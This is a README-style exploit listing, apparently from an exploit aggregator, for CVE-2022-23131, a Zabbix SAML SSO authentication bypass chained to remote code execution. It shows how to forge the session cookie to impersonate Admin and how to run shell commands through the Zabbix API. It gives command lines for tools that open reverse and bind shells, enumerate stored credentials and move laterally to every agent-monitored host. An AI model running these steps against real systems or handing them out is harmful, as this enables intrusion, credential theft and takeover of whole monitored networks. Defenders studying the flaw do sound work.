Exploit for Authentication Bypass by Spoofing in Zabbix CVE-2022-23131

Name: Exploit for Authentication Bypass by Spoofing in Zabbix CVE-2022-23131
Rating: 5 (9 reviews)
2026-06-22 | CVSS 9.8
## https://sploitus.com/exploit?id=BC1EFC7B-C6E0-528C-BD5D-A2D2ECE15187
# CVE-2022-23131 - Zabbix SAML SSO Authentication Bypass + RCE

## Overview

When SAML SSO is enabled, Zabbix stores session data in a client-side cookie (`zbx_session`) as a base64-encoded JSON blob. The server never verifies the signature of the `saml_data` field, allowing an unauthenticated attacker to forge the cookie and impersonate any user, including `Admin`.

With an Admin session, the Zabbix API's `script.create` / `script.execute` endpoints provide unauthenticated RCE on the Zabbix server and any host running the Zabbix agent.

**Affected versions:** Zabbix 5.4.0 - 5.4.8, 6.0.0 - 6.0.1 (SAML SSO must be enabled, non-default)

**CVSSv3:** 9.8 Critical

## How it works

### 1. Auth bypass

```
GET / -> zbx_session cookie contains:
  {"sessionid": "abc...", "sign": "xyz..."}

Forge cookie:
  {"saml_data": {"username_attribute": "Admin"}, "sessionid": "abc...", "sign": "xyz..."}

GET /index_sso.php with forged cookie -> 302 to /dashboard (logged in as Admin)
```

Zabbix trusts `saml_data.username_attribute` without signature verification.

### 2. RCE via API

```
POST /api_jsonrpc.php

script.create  -> define a shell command
script.execute -> run it on the Zabbix server (execute_on=1)
                  or on a remote agent (execute_on=0)
script.delete  -> clean up
```

## Tools

### `zbxcmd.py` - one-shot command runner

```bash
python3 zbxcmd.py -t https://TARGET -x "id"

# target a remote host via its Zabbix agent
python3 zbxcmd.py -t https://TARGET -x "id" --hostid 10453 --on agent
```

```
options:
  -t, --target    Zabbix base URL  (required)
  -u, --username  Username to impersonate (default: Admin)
  -x, --cmd       Command to execute (required)
  --hostid        Zabbix hostid (default: first available host)
  --on            Execution context: server (default) or agent
```

### `zbxshell.py` - interactive pseudo-shell

Runs each command through the API (no reverse shell or network callback needed).

```bash
python3 zbxshell.py -t https://TARGET

# shell on a remote host via Zabbix agent
python3 zbxshell.py -t https://TARGET --hostid 10453 --on agent
```

```
options:
  -t, --target    Zabbix base URL  (required)
  -u, --username  Username to impersonate (default: Admin)
  --hostid        Zabbix hostid (default: first available host)
  --on            Execution context: server (default) or agent
```

### `zbxapi.py` - interactive API enumeration

Menu-driven explorer covering users, hosts, macros, credentials, scripts, audit logs, and more.

```bash
python3 zbxapi.py -t https://TARGET
```

```
options:
  -t, --target    Zabbix base URL  (required)
  -u, --username  Username to impersonate (default: Admin)
```

### `zabbix_session_exp.py` - original exploit (bypass + reverse/bind shell)

```bash
# auth bypass only
python3 zabbix_session_exp.py -t https://TARGET -u Admin

# reverse shell
python3 zabbix_session_exp.py -t https://TARGET -u Admin -r LHOST:LPORT

# bind shell on target
python3 zabbix_session_exp.py -t https://TARGET -u Admin -b PORT
```

## Lateral movement

List all hosts monitored by Zabbix, then execute commands on them via their agents:

```bash
# enumerate hosts
python3 zbxapi.py -t https://TARGET
# pick option 2: All hosts + IPs

# execute on a remote host
python3 zbxshell.py -t https://TARGET --hostid  --on agent
```

The Zabbix agent must have `EnableRemoteCommands=1` in its config (common in enterprise deployments). This effectively gives command execution on every host in the Zabbix inventory.

## Requirements

```
pip install requests
```

Python 3.7+

## References

- [NVD - CVE-2022-23131](https://nvd.nist.gov/vuln/detail/CVE-2022-23131)
- [Sonar Source writeup](https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage)
- [Zabbix advisory](https://support.zabbix.com/browse/ZBX-20350)